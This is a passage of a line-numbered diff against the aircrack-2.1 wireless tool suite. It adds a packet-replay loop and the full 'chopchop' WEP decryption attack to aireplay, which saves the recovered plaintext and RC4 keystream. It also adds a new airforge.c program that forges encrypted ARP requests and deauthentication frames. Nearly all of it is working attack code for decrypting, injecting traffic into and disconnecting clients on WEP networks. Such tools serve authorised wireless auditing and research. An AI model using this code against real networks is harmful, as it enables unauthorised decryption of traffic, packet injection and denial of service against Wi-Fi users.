1013+ perror( "fwrite(packet header)" );
1014+ return( 1 );
1015+ }
1016
1017- arp_packets[cnt2].data = (unsigned char *)
1018- malloc( pkh.len );
1019+ n = pkh.caplen;
1020
1021- if( ! arp_packets[cnt2].data )
1022+ if( fwrite( h80211, 1, n, f_cap_out ) != (size_t) n )
1023 {
1024- perror( "malloc" );
1025+ perror( "fwrite(packet data)" );
1026 return( 1 );
1027 }
1028+ }
1029
1030- memcpy( arp_packets[cnt2].data, buffer, pkh.len );
1031+ if( opt.do_chopchop ) goto do_chopchop;
1032
1033- if( cnt2++ >= (int) sizeof( arp_packets ) )
1034- break;
1035+ /* rewrite MAC addresses & frame control */
1036+
1037+ if( opt.r_fc_0 != -1 ) h80211[0] = opt.r_fc_0;
1038+ if( opt.r_fc_1 != -1 ) h80211[1] = opt.r_fc_1;
1039+
1040+ z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
1041+
1042+ switch( h80211[1] & 3 )
1043+ {
1044+ case 0: i_bssid = 16; i_smac = 10; i_dmac = 4; break;
1045+ case 1: i_bssid = 4; i_smac = 10; i_dmac = 16; break;
1046+ case 2: i_bssid = 10; i_smac = 16; i_dmac = 4; break;
1047+ default: i_bssid = 4; i_dmac = 16; i_smac = 24; break;
1048+ }
1049+
1050+ if( memcmp( opt.r_bssid, NULL_MAC, 6 ) != 0 )
1051+ memcpy( h80211 + i_bssid, opt.r_bssid, 6 );
1052+
1053+ if( memcmp( opt.r_smac, NULL_MAC, 6 ) != 0 )
1054+ memcpy( h80211 + i_smac, opt.r_smac, 6 );
1055+
1056+ if( memcmp( opt.r_dmac, NULL_MAC, 6 ) != 0 )
1057+ memcpy( h80211 + i_dmac, opt.r_dmac, 6 );
1058+
1059+ /* standard operation mode: loop resending the packet */
1060+
1061+ memset( ticks, 0, sizeof( ticks ) );
1062+
1063+ nb_pkt_sent = 0;
1064+
1065+ while( 1 )
1066+ {
1067+ if( do_exit )
1068+ {
1069+ printf( "exiting.\n\n" );
1070+ return( 0 );
1071+ }
1072+
1073+ /* wait for the next timer interrupt */
1074+
1075+ if( read( fd_rtc, &n, sizeof( n ) ) < 0 )
1076+ {
1077+ perror( "\nread(/dev/rtc)" );
1078+ return( 1 );
1079+ }
1080+
1081+ ticks[0]++;
1082+ ticks[1]++;
1083+ ticks[2]++;
1084+
1085+ if( ticks[1] == 400 )
1086+ {
1087+ ticks[1] = 0;
1088+ printf( "\rSent %ld packets...\33[K", nb_pkt_sent );
1089+ fflush( stdout );
1090+ }
1091+
1092+ if( ( ticks[2] * opt.nbpps ) / 4096 < 1 )
1093+ continue;
1094+
1095+ ticks[2] = 0;
1096+
1097+ if( send_frame( fd_out, h80211, caplen ) != 0 )
1098+ {
1099+ if( errno != EAGAIN )
1100+ {
1101+ perror( "write" );
1102+ return( 1 );
1103+ }
1104+ }
1105+ else
1106+ nb_pkt_sent++;
1107 }
1108
1109- printf( "\r\33[1KRead %ld packets, got %ld "
1110- "potential ARP requests.\n", cnt1, cnt2 );
1111+ return( 0 );
1112+
1113+ /* chopchop operation mode: truncate and decrypt the packet */
1114+ /* we assume the plaintext starts with AA AA 03 00 00 00 */
1115+
1116+do_chopchop:
1117+
1118+ /* backup the packet */
1119
1120- if( cnt2 == 0 )
1121+ if( ( savebuf = (unsigned char *) malloc( pkh.caplen ) ) == NULL )
1122+ {
1123+ perror( "malloc" );
1124 return( 1 );
1125+ }
1126
1127- /* now loop sending the ARP packets we've got */
1128+ memcpy( savebuf, h80211, pkh.caplen );
1129
1130- cnt1 = 0;
1131+ /* setup the chopping buffer */
1132
1133- while( cnt2 )
1134+ n = pkh.caplen - z + 24;
1135+
1136+ if( ( chopped = (unsigned char *) malloc( n ) ) == NULL )
1137 {
1138- for( i = 0; i < cnt2; i++ )
1139+ perror( "malloc" );
1140+ return( 1 );
1141+ }
1142+
1143+ memset( chopped, 0, n );
1144+
1145+ data_start = z + 4;
1146+ data_end = pkh.caplen;
1147+
1148+ chopped[0] = 0x08; /* normal data frame */
1149+ chopped[1] = 0x41; /* WEP = 1, ToDS = 1 */
1150+
1151+ if( opt.r_fc_0 != -1 ) chopped[0] = opt.r_fc_0;
1152+ if( opt.r_fc_1 != -1 ) chopped[1] = opt.r_fc_1;
1153+
1154+ memcpy( chopped + 4, h80211 + i_bssid, 6 ); /* copy the BSSID */
1155+ memcpy( chopped + 24, h80211 + z, 4 ); /* copy the WEP IV */
1156+
1157+ /* setup the xor mask to hide the original data */
1158+
1159+ crc_mask = 0;
1160+
1161+ for( i = data_start; i < data_end - 4; i++ )
1162+ {
1163+ switch( i - data_start )
1164 {
1165- if( do_exit ) cnt2 = 0;
1166+ case 0: chopped[i] = 0xAA ^ 0xE0; break;
1167+ case 1: chopped[i] = 0xAA ^ 0xE0; break;
1168+ case 2: chopped[i] = 0x03 ^ 0x03; break;
1169+ default: chopped[i] = 0x55 ^ ( i & 0xFF ); break;
1170+ }
1171+
1172+ crc_mask = crc_tbl[crc_mask & 0xFF]
1173+ ^ ( crc_mask >> 8 )
1174+ ^ ( chopped[i] << 24 );
1175+ }
1176+
1177+ for( i = 0; i < 4; i++ )
1178+ crc_mask = crc_tbl[crc_mask & 0xFF]
1179+ ^ ( crc_mask >> 8 );
1180+
1181+ chopped[data_end - 4] = crc_mask; crc_mask >>= 8;
1182+ chopped[data_end - 3] = crc_mask; crc_mask >>= 8;
1183+ chopped[data_end - 2] = crc_mask; crc_mask >>= 8;
1184+ chopped[data_end - 1] = crc_mask; crc_mask >>= 8;
1185+
1186+ for( i = data_start; i < data_end; i++ )
1187+ chopped[i] ^= savebuf[i];
1188+
1189+ data_start += 6; /* skip the SNAP header */
1190+
1191+ /* if the replay source mac is unspecified, forge one */
1192+
1193+ if( memcmp( opt.r_smac, NULL_MAC, 6 ) == 0 )
1194+ {
1195+ is_deauth_mode = 1;
1196+
1197+ opt.r_smac[0] = 0x00;
1198+ opt.r_smac[1] = rand() & 0x3E;
1199+ opt.r_smac[2] = rand() & 0xFF;
1200+ opt.r_smac[3] = rand() & 0xFF;
1201+ opt.r_smac[4] = rand() & 0xFF;
1202+
1203+ memcpy( opt.r_dmac, "\xFF\xFF\xFF\xFF\xFF\xFF", 6 );
1204+ }
1205+ else
1206+ {
1207+ is_deauth_mode = 0;
1208
1209- if( time( NULL ) - tm_prev >= 1 )
1210+ opt.r_dmac[0] = 0xFF;
1211+ opt.r_dmac[1] = rand() & 0xFE;
1212+ opt.r_dmac[2] = rand() & 0xFF;
1213+ opt.r_dmac[3] = rand() & 0xFF;
1214+ opt.r_dmac[4] = rand() & 0xFF;
1215+ }
1216+
1217+ /* let's go chopping */
1218+
1219+ memset( ticks, 0, sizeof( ticks ) );
1220+
1221+ nb_pkt_read = 0;
1222+ nb_pkt_sent = 0;
1223+
1224+ tt = time( NULL );
1225+
1226+ guess = 256;
1227+
1228+ alarm( 15 );
1229+
1230+ signal( SIGALRM, sighandler );
1231+
1232+ if( fcntl( fd_in, F_SETFL, O_NONBLOCK ) < 0 )
1233+ {
1234+ perror( "fcntl(O_NONBLOCK)" );
1235+ return( 1 );
1236+ }
1237+
1238+ while( data_end > data_start )
1239+ {
1240+ if( do_exit == 1 )
1241+ {
1242+ printf( "exiting.\n\n" );
1243+ return( 1 );
1244+ }
1245+
1246+ if( do_exit == 2 )
1247+ {
1248+ printf( "\n\nThe chopchop attack appears to have failed. "
1249+ "Possible reasons:\n\n * Something is wrong with "
1250+ "the driver or the wireless card itself.\n * You "
1251+ "are too far from the AP. Get closer or reduce the "
1252+ "send rate." );
1253+
1254+ if( is_deauth_mode )
1255+ printf( "\n * The AP isn't vulnerable when operating in "
1256+ "non-authenticated mode.\n Run aireplay in "
1257+ "authenticated mode instead (-h option).\n\n" );
1258+ else
1259+ printf( "\n * The client MAC you have specified "
1260+ "is not currently authenticated."
1261+ "\n * The AP isn't vulnerable when operating in "
1262+ "authenticated mode.\n Run aireplay in non-"
1263+ "authenticated mode instead (no -h option).\n\n" );
1264+ return( 1 );
1265+ }
1266+
1267+ /* wait for the next timer interrupt */
1268+
1269+ if( read( fd_rtc, &n, sizeof( n ) ) < 0 )
1270+ {
1271+ perror( "read(/dev/rtc)" );
1272+ return( 1 );
1273+ }
1274+
1275+ ticks[0]++; /* ticks since we entered the while loop */
1276+ ticks[1]++; /* ticks since the last status line update */
1277+ ticks[2]++; /* ticks since the last frame was sent */
1278+ ticks[3]++; /* ticks since started chopping current byte */
1279+
1280+ /* update the status line */
1281+
1282+ if( ticks[1] == 400 )
1283+ {
1284+ ticks[1] = 0;
1285+ printf( "\rSent %3ld packets, current guess: %02X...\33[K",
1286+ nb_pkt_sent, guess );
1287+ fflush( stdout );
1288+ }
1289+
1290+ if( data_end == 40 && ticks[3] > 8 * ( ticks[0] - ticks[3] ) /
1291+ (int) ( pkh.caplen - ( data_end - 1 ) ) )
1292+ {
1293+ printf( "\n\nThe AP appears to drop packets shorter "
1294+ "than 40 bytes.\n" );
1295+
1296+ h80211 = buffer;
1297+
1298+ z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
1299+
1300+ if( ( chopped[data_end + 0] ^ savebuf[data_end + 0] ) == 0x06 &&
1301+ ( chopped[data_end + 1] ^ savebuf[data_end + 1] ) == 0x04 &&
1302+ ( chopped[data_end + 2] ^ savebuf[data_end + 2] ) == 0x00 )
1303 {
1304- tm_prev = time( NULL );
1305- printf( "\r\33[1KSent %ld packets\r", cnt1 );
1306- fflush( stdout );
1307+ printf( "Enabling standard workaround: "
1308+ "ARP header re-creation.\n" );
1309+
1310+ chopped[z + 10] = savebuf[z + 10] ^ 0x08;
1311+ chopped[z + 11] = savebuf[z + 11] ^ 0x06;
1312+ chopped[z + 12] = savebuf[z + 12] ^ 0x00;
1313+ chopped[z + 13] = savebuf[z + 13] ^ 0x01;
1314+ chopped[z + 14] = savebuf[z + 14] ^ 0x08;
1315+ chopped[z + 15] = savebuf[z + 15] ^ 0x00;
1316 }
1317+ else
1318+ {
1319+ printf( "Enabling standard workaround: "
1320+ " IP header re-creation.\n" );
1321+
1322+ n = pkh.caplen - ( z + 16 );
1323
1324- n = arp_packets[i].length;
1325+ chopped[z + 4] = savebuf[z + 4] ^ 0xAA;
1326+ chopped[z + 5] = savebuf[z + 5] ^ 0xAA;
1327+ chopped[z + 6] = savebuf[z + 6] ^ 0x03;
1328+ chopped[z + 7] = savebuf[z + 7] ^ 0x00;
1329+ chopped[z + 8] = savebuf[z + 8] ^ 0x00;
1330+ chopped[z + 9] = savebuf[z + 9] ^ 0x00;
1331+ chopped[z + 10] = savebuf[z + 10] ^ 0x08;
1332+ chopped[z + 11] = savebuf[z + 11] ^ 0x00;
1333+ chopped[z + 14] = savebuf[z + 14] ^ ( n >> 8 );
1334+ chopped[z + 15] = savebuf[z + 15] ^ ( n & 0xFF );
1335+
1336+ memcpy( buffer, savebuf, pkh.caplen );
1337+
1338+ for( i = z + 4; i < (int) pkh.caplen; i++ )
1339+ h80211[i - 4] = h80211[i] ^ chopped[i];
1340+
1341+ /* sometimes the header length or the tos field vary */
1342+
1343+ for( i = 0; i < 16; i++ )
1344+ {
1345+ h80211[z + 8] = 0x40 + i;
1346+ chopped[z + 12] = savebuf[z + 12] ^ ( 0x40 + i );
1347+
1348+ for( j = 0; j < 256; j++ )
1349+ {
1350+ h80211[z + 9] = j;
1351+ chopped[z + 13] = savebuf[z + 13] ^ j;
1352+
1353+ if( check_crc_buf( h80211 + z, pkh.caplen - z - 8 ) )
1354+ goto have_crc_match;
1355+ }
1356+ }
1357
1358- if( write( raw_sock, arp_packets[i].data, n ) != n )
1359+ printf( "This doesn't look like an IP packet, "
1360+ "try another one.\n" );
1361+
1362+ }
1363+
1364+ have_crc_match:
1365+ break;
1366+ }
1367+
1368+ if( ( ticks[2] * opt.nbpps ) / 4096 > 0 )
1369+ {
1370+ /* send one modified frame */
1371+
1372+ ticks[2] = 0;
1373+
1374+ memcpy( buffer, chopped, data_end - 1 );
1375+
1376+ /* note: guess 256 is special, it tests if the *
1377+ * AP properly drops frames with an invalid ICV *
1378+ * so this guess always has its bit 8 set to 0 */
1379+
1380+ if( is_deauth_mode )
1381 {
1382- perror( "write" );
1383+ opt.r_smac[1] |= ( guess < 256 );
1384+ opt.r_smac[5] = guess & 0xFF;
1385+ }
1386+ else
1387+ {
1388+ opt.r_dmac[1] |= ( guess < 256 );
1389+ opt.r_dmac[5] = guess & 0xFF;
1390+ }
1391+
1392+ memcpy( buffer + 10, opt.r_smac, 6 );
1393+ memcpy( buffer + 16, opt.r_dmac, 6 );
1394+
1395+ if( guess < 256 )
1396+ {
1397+ buffer[data_end - 2] ^= crc_chop_tbl[guess][3];
1398+ buffer[data_end - 3] ^= crc_chop_tbl[guess][2];
1399+ buffer[data_end - 4] ^= crc_chop_tbl[guess][1];
1400+ buffer[data_end - 5] ^= crc_chop_tbl[guess][0];
1401+ }
1402+
1403+ if( send_frame( fd_out, buffer, data_end -1 ) != 0 )
1404+ {
1405+ if( errno != EAGAIN )
1406+ {
1407+ perror( "write" );
1408+ return( 1 );
1409+ }
1410+ }
1411+ else
1412+ {
1413+ nb_pkt_sent++;
1414+ if( ++guess > 256 ) guess = 0;
1415+ }
1416+ }
1417+
1418+ /* watch for a response from the AP */
1419+
1420+ memset( buffer, 0, 2048 );
1421+
1422+ if( ( caplen = read( fd_in, buffer,
1423+ sizeof( buffer ) ) ) < 0 )
1424+ {
1425+ if( errno == EAGAIN ) continue;
1426+ perror( "read" );
1427+ return( 1 );
1428+ }
1429+
1430+ /* if device is an atheros, remove the FCS */
1431+
1432+ if( memcmp( argv[argc - 1], "ath", 3 ) == 0 )
1433+ caplen -= 4;
1434+
1435+ nb_pkt_read++;
1436+
1437+ /* skip the prism header if present */
1438+
1439+ h80211 = buffer;
1440+
1441+ if( arptype_in == ARPHRD_IEEE80211_PRISM )
1442+ {
1443+ n = *(int *)( buffer + 4 );
1444+
1445+ if( n < 8 || n >= (int) caplen )
1446+ continue;
1447+
1448+ h80211 += n;
1449+ caplen -= n;
1450+ }
1451+
1452+ /* check if it's a deauthentication packet */
1453+
1454+ if( h80211[0] == 0xC0 )
1455+ {
1456+ if( memcmp( h80211 + 4, opt.r_smac, 6 ) == 0 &&
1457+ ! is_deauth_mode )
1458+ {
1459+ printf( "\rThe client's source MAC you have specified "
1460+ "does not appear to\nbe authenticated (got a "
1461+ "deauthentication packet from the AP).\n\n" );
1462+ return( 1 );
1463+ }
1464+
1465+ if( h80211[4] != opt.r_smac[0] ) continue;
1466+ if( h80211[6] != opt.r_smac[2] ) continue;
1467+ if( h80211[7] != opt.r_smac[3] ) continue;
1468+ if( h80211[8] != opt.r_smac[4] ) continue;
1469+
1470+ if( ( h80211[5] & 0xFE ) !=
1471+ ( opt.r_smac[1] & 0xFE ) ) continue;
1472+
1473+ if( ! ( h80211[5] & 1 ) )
1474+ {
1475+ printf( "\rThe Access Point does not appear to properly "
1476+ "discard frames with an\ninvalid ICV - try running "
1477+ "aireplay in authenticated mode (-h) instead.\n\n" );
1478+ return( 1 );
1479+ }
1480+ }
1481+ else
1482+ {
1483+ if( is_deauth_mode )
1484+ continue;
1485+
1486+ /* check if it's a WEP data packet */
1487+
1488+ if( ( h80211[0] & 0x0C ) != 8 ) continue;
1489+ if( ( h80211[0] & 0xF0 ) != 0 ) continue;
1490+ if( ( h80211[1] & 0x03 ) != 2 ) continue;
1491+ if( ( h80211[1] & 0x40 ) == 0 ) continue;
1492+
1493+ /* check the extended IV (TKIP) flag */
1494+
1495+ z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
1496+
1497+ if( ( h80211[z + 3] & 0x20 ) != 0 ) continue;
1498+
1499+ /* check the destination address */
1500+
1501+ if( h80211[4] != opt.r_dmac[0] ) continue;
1502+ if( h80211[6] != opt.r_dmac[2] ) continue;
1503+ if( h80211[7] != opt.r_dmac[3] ) continue;
1504+ if( h80211[8] != opt.r_dmac[4] ) continue;
1505+
1506+ if( ( h80211[5] & 0xFE ) !=
1507+ ( opt.r_dmac[1] & 0xFE ) ) continue;
1508+
1509+ if( ! ( h80211[5] & 1 ) )
1510+ {
1511+ printf( "\nThe Access Point does not appear to properly "
1512+ "discard frames with an\ninvalid ICV - try running "
1513+ "aireplay in non-authenticated mode instead.\n\n" );
1514 return( 1 );
1515 }
1516+ }
1517+
1518+ /* we have a winner */
1519+
1520+ guess = h80211[9];
1521+
1522+ chopped[data_end - 1] ^= guess;
1523+ chopped[data_end - 2] ^= crc_chop_tbl[guess][3];
1524+ chopped[data_end - 3] ^= crc_chop_tbl[guess][2];
1525+ chopped[data_end - 4] ^= crc_chop_tbl[guess][1];
1526+ chopped[data_end - 5] ^= crc_chop_tbl[guess][0];
1527+
1528+ n = pkh.caplen - data_start;
1529
1530- cnt1++;
1531+ printf( "\rOffset %4d (%2d%% done) | xor = %02X | pt = %02X | "
1532+ "%4ld frames written in %5ldms\n", data_end - 1,
1533+ 100 * ( pkh.caplen - data_end ) / n,
1534+ chopped[data_end - 1],
1535+ chopped[data_end - 1] ^ savebuf[data_end - 1],
1536+ nb_pkt_sent, ( 1000 * ticks[3] ) / 4096 );
1537+
1538+ nb_pkt_sent = ticks[3] = 0;
1539+
1540+ guess = 256;
1541+
1542+ if( is_deauth_mode )
1543+ {
1544+ opt.r_smac[1] = rand() & 0x3E;
1545+ opt.r_smac[2] = rand() & 0xFF;
1546+ opt.r_smac[3] = rand() & 0xFF;
1547+ opt.r_smac[4] = rand() & 0xFF;
1548 }
1549+ else
1550+ {
1551+ opt.r_dmac[1] = rand() & 0xFE;
1552+ opt.r_dmac[2] = rand() & 0xFF;
1553+ opt.r_dmac[3] = rand() & 0xFF;
1554+ opt.r_dmac[4] = rand() & 0xFF;
1555+ }
1556+
1557+ data_end--;
1558+
1559+ alarm( 0 );
1560 }
1561
1562- printf( "\r\33[1KSent %ld packets.\n", cnt1 );
1563+ /* reveal the plaintext (chopped contains the prga) */
1564+
1565+ h80211 = savebuf;
1566+
1567+ z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
1568+
1569+ chopped[z + 4] = savebuf[z + 4] ^ 0xAA;
1570+ chopped[z + 5] = savebuf[z + 5] ^ 0xAA;
1571+ chopped[z + 6] = savebuf[z + 6] ^ 0x03;
1572+ chopped[z + 7] = savebuf[z + 7] ^ 0x00;
1573+ chopped[z + 8] = savebuf[z + 8] ^ 0x00;
1574+ chopped[z + 9] = savebuf[z + 9] ^ 0x00;
1575+
1576+ for( i = z + 4; i < (int) pkh.caplen; i++ )
1577+ h80211[i - 4] = h80211[i] ^ chopped[i];
1578+
1579+ if( ! check_crc_buf( h80211 + z, pkh.caplen - z - 8 ) )
1580+ printf( "\nWarning: ICV checksum verification FAILED!\n" );
1581+
1582+ pkh.caplen -= 4 + 4; /* remove the WEP IV & CRC (ICV) */
1583+ pkh.len -= 4 + 4;
1584+
1585+ h80211[1] &= 0xBF; /* remove the WEP bit, too */
1586+
1587+ /* save the decrypted packet */
1588+
1589+ sprintf( tmp_str, "replay_dec-%02d%02d%02d-%02d%02d%02d.cap",
1590+ lt->tm_year - 100, 1 + lt->tm_mon, lt->tm_mday,
1591+ lt->tm_hour, lt->tm_min, lt->tm_sec );
1592+
1593+ printf( "\nSaving plaintext in %s\n", tmp_str );
1594+
1595+ if( ( f_cap_out = fopen( tmp_str, "wb+" ) ) == NULL )
1596+ {
1597+ perror( "fopen(output pcap,wb+)" );
1598+ return( 1 );
1599+ }
1600+
1601+ n = sizeof( struct pcap_file_header );
1602+
1603+ if( fwrite( &pfh, 1, n, f_cap_out ) != (size_t) n )
1604+ {
1605+ perror( "fwrite(pcap file header)" );
1606+ return( 1 );
1607+ }
1608+
1609+ n = sizeof( pkh );
1610+
1611+ if( fwrite( &pkh, 1, n, f_cap_out ) != (size_t) n )
1612+ {
1613+ perror( "fwrite(packet header)" );
1614+ return( 1 );
1615+ }
1616+
1617+ n = pkh.caplen;
1618+
1619+ if( fwrite( h80211, 1, n, f_cap_out ) != (size_t) n )
1620+ {
1621+ perror( "fwrite(packet data)" );
1622+ return( 1 );
1623+ }
1624+
1625+ /* save the RC4 xor mask (prga) */
1626+
1627+ sprintf( tmp_str, "replay_dec-%02d%02d%02d-%02d%02d%02d.xor",
1628+ lt->tm_year - 100, 1 + lt->tm_mon, lt->tm_mday,
1629+ lt->tm_hour, lt->tm_min, lt->tm_sec );
1630+
1631+ printf( "Saving keystream in %s\n", tmp_str );
1632+
1633+ if( ( f_cap_out = fopen( tmp_str, "wb+" ) ) == NULL )
1634+ {
1635+ perror( "fopen(output prga,wb+)" );
1636+ return( 1 );
1637+ }
1638+
1639+ n = pkh.caplen + 8 - z;
1640+
1641+ if( fwrite( chopped + z, 1, n, f_cap_out ) != (size_t) n )
1642+ {
1643+ perror( "fwrite(prga data)" );
1644+ return( 1 );
1645+ }
1646+
1647+ printf( "\nCompleted in %lds (%0.2f bytes/s)\n\n",
1648+ time( NULL ) - tt,
1649+ (float) ( pkh.caplen - 6 - z ) /
1650+ (float) ( time( NULL ) - tt ) );
1651+
1652+ /* that's all, folks */
1653
1654 return( 0 );
1655 }
1656diff -urN aircrack-2.1.orig/airforge.c aircrack-2.1/airforge.c
1657--- aircrack-2.1.orig/airforge.c 1970-01-01 01:00:00.000000000 +0100
1658+++ aircrack-2.1/airforge.c 2005-04-22 08:51:21.933064968 +0200
1659@@ -0,0 +1,267 @@
1660+/*
1661+ * 802.11 ARP-request & deauthentication frame forgery
1662+ *
1663+ * Copyright (C) 2005 Christophe Devine
1664+ *
1665+ * This program is free software; you can redistribute it and/or modify
1666+ * it under the terms of the GNU General Public License as published by
1667+ * the Free Software Foundation; either version 2 of the License, or
1668+ * (at your option) any later version.
1669+ *
1670+ * This program is distributed in the hope that it will be useful,
1671+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
1672+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
1673+ * GNU General Public License for more details.
1674+ *
1675+ * You should have received a copy of the GNU General Public License
1676+ * along with this program; if not, write to the Free Software
1677+ * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
1678+ */
1679+
1680+#include <arpa/inet.h>
1681+#include <string.h>
1682+#include <stdlib.h>
1683+#include <stdio.h>
1684+
1685+#include "pcap-aireplay.h"
1686+#include "crctable.h"
1687+
1688+#define ARP_REQ \
1689+ "\x08\x40\x02\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \
1690+ "\xFF\xFF\xFF\xFF\xFF\xFF\x80\x01\x55\x55\x55\x55\xAA\xAA\x03\x00" \
1691+ "\x00\x00\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01\xCC\xCC\xCC\xCC" \
1692+ "\xCC\xCC\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x22\x22\x22\x22" \
1693+ "\x00\x00\x00\x00"
1694+
1695+#define DEAUTH_REQ \
1696+ "\xC0\x00\x02\x01\xCC\xCC\xCC\xCC\xCC\xCC\xBB\xBB\xBB\xBB\xBB\xBB" \
1697+ "\xBB\xBB\xBB\xBB\xBB\xBB\x00\x00\x07\x00"
1698+
1699+char usage[] =
1700+
1701+"\n"
1702+" airforge 2.2 - (C) 2005 Christophe Devine\n"
1703+"\n"
1704+" usage 1: arp-request forgery\n"
1705+"\n"
1706+" arpforge <prga file> <type> <bssid> <mac src>\n"
1707+" <ip src> <ip dst> <output filename>\n"
1708+"\n"
1709+" usage 2: deauthentication frame forgery\n"
1710+"\n"
1711+" arpforge <bssid> <dst mac> <output filename>\n"
1712+"\n";
1713+
1714+int getmac( char *s, unsigned char *mac )
1715+{
1716+ int i = 0, n;
1717+
1718+ while( sscanf( s, "%x", &n ) == 1 )
1719+ {
1720+ if( n < 0 || n > 255 )
1721+ return( 1 );
1722+
1723+ mac[i] = n;
1724+
1725+ if( ++i == 6 ) break;
1726+
1727+ if( ! ( s = strchr( s, ':' ) ) )
1728+ break;
1729+
1730+ s++;
1731+ }
1732+
1733+ return( i != 6 );
1734+}
1735+
1736+int main( int argc, char *argv[] )
1737+{
1738+ int n;
1739+ unsigned long int crc;
1740+ FILE *f_prga, *f_cap_out;
1741+
1742+ unsigned char h80211[128];
1743+ unsigned char bssid[6];
1744+ unsigned char saddr[6];
1745+ unsigned char daddr[6];
1746+ unsigned char ipsrc[4];
1747+ unsigned char ipdst[4];
1748+ unsigned char prga[44];
1749+
1750+ struct pcap_file_header pfh;
1751+ struct pcap_pkthdr pkh;
1752+ struct timeval tv;
1753+
1754+ if( argc == 4 )
1755+ goto forge_deauth;
1756+
1757+ if( argc != 8 )
1758+ {
1759+ printf( usage );
1760+ return( 1 );
1761+ }
1762+
1763+ if( ( f_prga = fopen( argv[1], "rb" ) ) == NULL )
1764+ {
1765+ perror( "fopen(input prga,rb)" );
1766+ return( 1 );
1767+ }
1768+
1769+ memcpy( h80211, ARP_REQ, pkh.caplen = 68 );
1770+
1771+ n = atoi( argv[2] );
1772+
1773+ if( n != 1 && n != 2 )
1774+ {
1775+ fprintf( stderr, "Invalid type: must be 1 "
1776+ "(ToDS) or 2 (FromDS).\n" );
1777+ return( 1 );
1778+ }
1779+
1780+ h80211[1] |= n;
1781+
1782+ if( getmac( argv[3], bssid ) != 0 )
1783+ {
1784+ fprintf( stderr, "Invalid BSSID.\n" );
1785+ return( 1 );
1786+ }
1787+
1788+ if( getmac( argv[4], saddr ) != 0 )
1789+ {
1790+ fprintf( stderr, "Invalid source MAC.\n" );
1791+ return( 1 );
1792+ }
1793+
1794+ memcpy( daddr, "\xFF\xFF\xFF\xFF\xFF\xFF", 6 );
1795+
1796+ if( ! inet_aton( argv[5], (struct in_addr *) ipsrc ) )
1797+ {
1798+ fprintf( stderr, "Invalid source IP.\n" );
1799+ return( 1 );
1800+ }
1801+
1802+ if( ! inet_aton( argv[6], (struct in_addr *) ipdst ) )
1803+ {
1804+ fprintf( stderr, "Invalid destination IP.\n" );
1805+ return( 1 );
1806+ }
1807+
1808+ if( n == 1 )
1809+ {
1810+ memcpy( h80211 + 4, bssid, 6 );
1811+ memcpy( h80211 + 10, saddr, 6 );
1812+ memcpy( h80211 + 16, daddr, 6 );
1813+ }
1814+
1815+ if( n == 2 )
1816+ {
1817+ memcpy( h80211 + 10, bssid, 6 );
1818+ memcpy( h80211 + 16, saddr, 6 );
1819+ memcpy( h80211 + 4, daddr, 6 );
1820+ }
1821+
1822+ memcpy( h80211 + 44, saddr, 6 );
1823+ memcpy( h80211 + 50, ipsrc, 4 );
1824+ memcpy( h80211 + 60, ipdst, 4 );
1825+
1826+ /* XXX: this source code lacks comments */
1827+
1828+ crc = 0xFFFFFFFF;
1829+
1830+ for( n = 28; n < 64; n++ )
1831+ crc = crc_tbl[(crc ^ h80211[n]) & 0xFF] ^ (crc >> 8);
1832+
1833+ crc = ~crc;
1834+
1835+ h80211[64] = (crc ) & 0xFF;
1836+ h80211[65] = (crc >> 8) & 0xFF;
1837+ h80211[66] = (crc >> 16) & 0xFF;
1838+ h80211[67] = (crc >> 24) & 0xFF;
1839+
1840+ if( fread( prga, 44, 1, f_prga ) != 1 )
1841+ {
1842+ fprintf( stderr, "fread(44 bytes) failed - prga too short ?\n" );
1843+ return( 1 );
1844+ }
1845+
1846+ memcpy( h80211 + 24, prga, 4 );
1847+
1848+ for( n = 28; n < 68; n++ )
1849+ h80211[n] ^= prga[n - 24];
1850+
1851+ n = 7;
1852+
1853+ goto write_packet;
1854+
1855+forge_deauth:
1856+
1857+ memcpy( h80211, DEAUTH_REQ, pkh.caplen = 26 );
1858+
1859+ if( getmac( argv[1], bssid ) != 0 )
1860+ {
1861+ fprintf( stderr, "Invalid BSSID.\n" );
1862+ return( 1 );
1863+ }
1864+
1865+ if( getmac( argv[2], daddr ) != 0 )
1866+ {
1867+ fprintf( stderr, "Invalid destination MAC.\n" );
1868+ return( 1 );
1869+ }
1870+
1871+ memcpy( h80211 + 4, daddr, 6 );
1872+ memcpy( h80211 + 10, bssid, 6 );
1873+ memcpy( h80211 + 16, bssid, 6 );
1874+
1875+ n = 3;
1876+
1877+write_packet:
1878+
1879+ if( ( f_cap_out = fopen( argv[n], "wb+" ) ) == NULL )
1880+ {
1881+ fprintf( stderr, "failed: fopen(%s,wb+)\n", argv[7] );
1882+ return( 1 );
1883+ }
1884+
1885+ pfh.magic = TCPDUMP_MAGIC;
1886+ pfh.version_major = PCAP_VERSION_MAJOR;
1887+ pfh.version_minor = PCAP_VERSION_MINOR;
1888+ pfh.thiszone = 0;
1889+ pfh.sigfigs = 0;
1890+ pfh.snaplen = 65535;
1891+ pfh.linktype = LINKTYPE_IEEE802_11;
1892+
1893+ n = sizeof( struct pcap_file_header );
1894+
1895+ if( fwrite( &pfh, 1, n, f_cap_out ) != (size_t) n )
1896+ {
1897+ fprintf( stderr, "failed: fwrite(pcap file header)\n" );
1898+ return( 1 );
1899+ }
1900+
1901+ gettimeofday( &tv, NULL );
1902+
1903+ pkh.tv_sec = tv.tv_sec;
1904+ pkh.tv_usec = tv.tv_usec;
1905+ pkh.len = pkh.caplen;
1906+
1907+ n = sizeof( pkh );
1908+
1909+ if( fwrite( &pkh, 1, n, f_cap_out ) != (size_t) n )
1910+ {
1911+ fprintf( stderr, "fwrite(packet header) failed\n" );
1912+ return( 1 );
1913+ }
1914+
1915+ n = pkh.caplen;
1916+
1917+ if( fwrite( h80211, 1, n, f_cap_out ) != (size_t) n )
1918+ {
1919+ fprintf( stderr, "fwrite(packet data) failed\n" );
1920+ return( 1 );
1921+ }
1922+
1923+ printf( "Done.\n" );
1924+
1925+ return( 0 );
1926+}
